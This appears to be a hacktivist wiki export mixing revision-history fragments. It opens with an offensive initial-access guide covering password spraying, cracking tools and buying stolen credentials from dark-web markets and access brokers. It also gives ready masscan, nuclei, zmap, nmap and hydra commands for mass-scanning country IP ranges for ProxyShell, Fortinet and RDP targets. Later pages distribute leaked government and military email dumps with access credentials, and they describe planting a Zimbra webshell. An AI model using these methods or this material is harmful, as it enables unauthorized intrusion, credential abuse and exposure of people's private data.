If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.<br />
<br />
=== Usernames ===<br />
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and emails for password spraying.<br />
<br />
* https://github.com/digininja/CeWL<br />
* https://github.com/Mebus/cupp<br />
* https://github.com/digininja/RSMangler<br />
* https://github.com/sc0tfree/mentalist<br />
* https://github.com/urbanadventurer/username-anarchy<br />
* https://github.com/vysecurity/LinkedInt<br />
* https://github.com/initstring/linkedin2username<br />
* https://github.com/shroudri/username_generator<br />
<br />
=== Passwords ===<br />
Common and leaked credentials to test login portals and network services.<br />
<br />
==== Default passwords ====<br />
* https://cirt.net/passwords<br />
* https://default-password.info<br />
* https://datarecovery.com/rd/default-passwords<br />
* https://github.com/ihebski/DefaultCreds-cheat-sheet<br />
<br />
==== Common and leaked passwords ====<br />
* https://wiki.skullsecurity.org/index.php?title=Passwords<br />
* https://github.com/danielmiessler/SecLists/tree/master/Passwords<br />
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases<br />
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt<br />
<br />
=== Password cracking tools ===<br />
<br />
* https://github.com/byt3bl33d3r/SprayingToolkit<br />
* https://www.kali.org/tools/hydra<br />
* https://www.kali.org/tools/brutespray<br />
* https://www.kali.org/tools/medusa<br />
* https://www.kali.org/tools/patator<br />
* https://github.com/1N3/BruteX<br />
<br />
=== Searching leaks ===<br />
* https://github.com/khast3x/h8mail [Free but includes paid services]<br />
<br />
==== Services ====<br />
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''<br />
<br />
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.<br />
<br />
* https://haveibeenpwned.com<br />
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]<br />
* https://dehashed.com [Paid. Accepts crypto (BTC)]<br />
<br />
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, email:pass.<br />
<br />
=== Password spraying ===<br />
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.<br />
<br />
* https://github.com/dafthack/MSOLSpray<br />
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying<br />
* https://github.com/blacklanternsecurity/TREVORspray<br />
* https://github.com/knavesec/CredMaster<br />
* https://github.com/xFreed0m/RDPassSpray<br />
* https://github.com/dafthack/MailSniper<br />
<br />
=== Hash cracking ===<br />
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!<br />
<br />
==== Identify hash ====<br />
* https://github.com/blackploit/hash-identifier<br />
<br />
==== Online tools ====<br />
* https://hashes.com/en/decrypt/hash [Free & Paid]<br />
* https://crackstation.net<br />
<br />
==== Offline tools ====<br />
* https://github.com/hashcat/hashcat<br />
* https://github.com/openwall/john<br />
* https://github.com/NotSoSecure/password_cracking_rules<br />
<br />
== Buying access ==<br />
<br />
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.<br />
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]<br />
<br />
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).<br />
<br />
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])<br />
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])<br />
<br />
== Spray and pray ==<br />
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.<br />
<br />
=== Prerequisites ===<br />
There are some prerequisites you will need to follow the below examples:<br />
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])<br />
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]<br />
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session<br />
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].<br />
<br />
=== Networks ===<br />
==== Vulnerability Scanning ====<br />
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.<br />
<br />
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.<br />
<br />
'''IP Ranges''':<br />
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges<br />
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])<br />
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks<br />
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0<br />
<br />
===== Proxyshell =====<br />
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]<br />
<br />
'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:<br />
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code><br />
<br />
* <code>sed -i 's/$/:443/' results.txt</code><br />
<br />
*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code><br />
<br />
Exploit Discovered hosts: [[Proxyshell]]<br />
<br />
===== CVE-2018-13379 =====<br />
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:<br />
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code><br />
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code><br />
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code><br />
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]<br />
<br />
'''Tool''': [https://github.com/zmap/zmap zmap]<br />
<br />
'''1.''' Scan for Microsoft Exchange Email Servers:<br />
<pre><br />
sudo zmap -q -p 443 | httpx -silent -s -sd -location \<br />
> | awk '/owa/ { print substr($1,9) }' > owa.txt<br />
</pre><br />
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] <br />
<pre><br />
nmap -p 443 -Pn -n \<br />
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt<br />
</pre><br />
<br />
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]<br />
<br />
===== Domains =====<br />
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.<br />
<br />
See [[Domain Spray and Pray]] scanning.<br />
<br />
==== Password Attacks ====<br />
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.<br />
<br />
===== RDP =====<br />
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:<br />
<br><br />
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt></code><br />
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code><br />
<br />
===== VPN =====<br />
'''2.''' Virtual Private Network (VPN) Brute forcing:<br />
<br><br />
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt></code><br />
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia/en&diff=1681Fiscalia/en2023-11-09T17:54:30Z<p>Enlacehacktivista: Created page with "== Media Coverage =="</p>
<hr />
<div><languages/><br />
The hacker group "Guacamaya" published a [https://enlacehacktivista.org/comunicado_guacamaya3.txt statement] along with more than 5 TB of email from the Fiscalia of Colombia. As it has a lot of personal information, this leak won't be fully public, but it will be shared with any journalists or organizations that want to investigate Fiscalia. For access to the emails, contact [[Contact|us]] or [mailto:press@ddosecrets.com DDoSecrets.]<br />
<br />
== Media Coverage ==<br />
<br />
* https://www.occrp.org/en/narcofiles-the-new-criminal-order/what-is-narcofiles-the-new-criminal-order-everything-you-need-to-know<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (without paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Translations:Fiscalia/3/en&diff=1680Translations:Fiscalia/3/en2023-11-09T17:54:16Z<p>Enlacehacktivista: Created page with "== Media Coverage =="</p>
<hr />
<div>== Media Coverage ==</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia/en&diff=1679Fiscalia/en2023-11-09T17:54:13Z<p>Enlacehacktivista: Created page with "* https://www.occrp.org/en/narcofiles-the-new-criminal-order/what-is-narcofiles-the-new-criminal-order-everything-you-need-to-know * https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (without paywall)] * https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/ * https://twitter.com/elespectador/status/159652252900670..."</p>
<hr />
<div><languages/><br />
The hacker group "Guacamaya" published a [https://enlacehacktivista.org/comunicado_guacamaya3.txt statement] along with more than 5 TB of email from the Fiscalia of Colombia. As it has a lot of personal information, this leak won't be fully public, but it will be shared with any journalists or organizations that want to investigate Fiscalia. For access to the emails, contact [[Contact|us]] or [mailto:press@ddosecrets.com DDoSecrets.]<br />
<br />
<div lang="es" dir="ltr" class="mw-content-ltr"><br />
== Cobertura mediática ==<br />
</div><br />
<br />
* https://www.occrp.org/en/narcofiles-the-new-criminal-order/what-is-narcofiles-the-new-criminal-order-everything-you-need-to-know<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (without paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Translations:Fiscalia/4/en&diff=1678Translations:Fiscalia/4/en2023-11-09T17:54:02Z<p>Enlacehacktivista: Created page with "* https://www.occrp.org/en/narcofiles-the-new-criminal-order/what-is-narcofiles-the-new-criminal-order-everything-you-need-to-know * https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (without paywall)] * https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/ * https://twitter.com/elespectador/status/159652252900670..."</p>
<hr />
<div>* https://www.occrp.org/en/narcofiles-the-new-criminal-order/what-is-narcofiles-the-new-criminal-order-everything-you-need-to-know<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (without paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia&diff=1673Fiscalia2023-11-09T17:52:45Z<p>Enlacehacktivista: Marked this version for translation</p>
<hr />
<div><languages/><br />
<translate><br />
<!--T:2--><br />
El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya3.txt comunicado] junto con mas de 5 TB de correos de la Fiscalia de Colombia. Dice tener datos sensibles de muchas personas, por lo cual aclara que solo seŕa compartidos con periodistas y otras personas u organizaciones que puedan garantizar que solo van a usarlo para investigar a miembros de la Fiscalia y sus vinculos con narco trafico, militares y paramilitares entes del gobierno y empresas corruptas. Para tener acceso contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets.]<br />
</translate><br />
<br />
<translate><br />
== Cobertura mediática == <!--T:3--><br />
<br />
<!--T:4--><br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (sin paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595<br />
* https://cerosetenta.uniandes.edu.co/que-es-narcofiles-el-nuevo-orden-criminal-todo-lo-que-necesitas-saber/<br />
</translate></div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia&diff=1672Fiscalia2023-11-09T17:50:55Z<p>Enlacehacktivista: </p>
<hr />
<div><languages/><br />
<translate><br />
<!--T:2--><br />
El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya3.txt comunicado] junto con mas de 5 TB de correos de la Fiscalia de Colombia. Dice tener datos sensibles de muchas personas, por lo cual aclara que solo seŕa compartidos con periodistas y otras personas u organizaciones que puedan garantizar que solo van a usarlo para investigar a miembros de la Fiscalia y sus vinculos con narco trafico, militares y paramilitares entes del gobierno y empresas corruptas. Para tener acceso contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets.]<br />
</translate><br />
<br />
<translate><br />
<!--T:3--><br />
== Cobertura mediática ==<br />
<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (sin paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595<br />
* https://cerosetenta.uniandes.edu.co/que-es-narcofiles-el-nuevo-orden-criminal-todo-lo-que-necesitas-saber/<br />
</translate></div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia&diff=1671Fiscalia2023-11-09T17:49:50Z<p>Enlacehacktivista: </p>
<hr />
<div><languages/><br />
<translate><br />
<!--T:2--><br />
El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya3.txt comunicado] junto con mas de 5 TB de correos de la Fiscalia de Colombia. Dice tener datos sensibles de muchas personas, por lo cual aclara que solo seŕa compartidos con periodistas y otras personas u organizaciones que puedan garantizar que solo van a usarlo para investigar a miembros de la Fiscalia y sus vinculos con narco trafico, militares y paramilitares entes del gobierno y empresas corruptas. Para tener acceso contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets.]<br />
</translate><br />
<br />
<translate><br />
== Cobertura mediática ==<br />
<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (sin paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595<br />
* https://cerosetenta.uniandes.edu.co/que-es-narcofiles-el-nuevo-orden-criminal-todo-lo-que-necesitas-saber/<br />
</translate></div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fiscalia&diff=1670Fiscalia2023-11-09T17:04:14Z<p>Enlacehacktivista: </p>
<hr />
<div><languages/><br />
<translate><br />
<!--T:2--><br />
El grupo hacker "Guacamaya" publicó un [https://enlacehacktivista.org/comunicado_guacamaya3.txt comunicado] junto con mas de 5 TB de correos de la Fiscalia de Colombia. Dice tener datos sensibles de muchas personas, por lo cual aclara que solo seŕa compartidos con periodistas y otras personas u organizaciones que puedan garantizar que solo van a usarlo para investigar a miembros de la Fiscalia y sus vinculos con narco trafico, militares y paramilitares entes del gobierno y empresas corruptas. Para tener acceso contacta con [[Contact|nosotros]] o [mailto:press@ddosecrets.com DDoSecrets.]<br />
</translate><br />
<br />
== Cobertura mediática ==<br />
<br />
* https://www.elespectador.com/judicial/hackeo-a-la-fiscalia-el-bunker-ha-estado-negociando-con-exdirectivos-de-odebrecht/ [https://archive.ph/sWdEl (sin paywall)]<br />
* https://www.elespectador.com/judicial/el-millonario-caso-de-corrupcion-detras-del-tramite-web-de-la-libreta-militar/<br />
* https://twitter.com/elespectador/status/1596522529006702595<br />
* https://cerosetenta.uniandes.edu.co/que-es-narcofiles-el-nuevo-orden-criminal-todo-lo-que-necesitas-saber/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=1669Fuerzas Represivas2023-11-09T17:02:20Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
* https://www.proceso.com.mx/nacional/2022/11/6/cndh-estalla-por-reportaje-de-proceso-que-revela-ordenes-de-la-sedena-sobre-caso-ayotzinapa-296486.html<br />
* https://lasillarota.com/nacion/2022/11/11/guacamaya-leaks-sedena-pidio-zaldivar-suavizar-jueces-por-delitos-de-militares-401304.html<br />
* https://ejercitoespia.r3d.mx/<br />
* https://aristeguinoticias.com/1303/mexico/guacamaya-leaks-documentan-seguimiento-militar-a-normalistas/<br />
* https://www.ejecentral.com.mx/arman-en-colombia-poderosa-estructura-financiera/<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
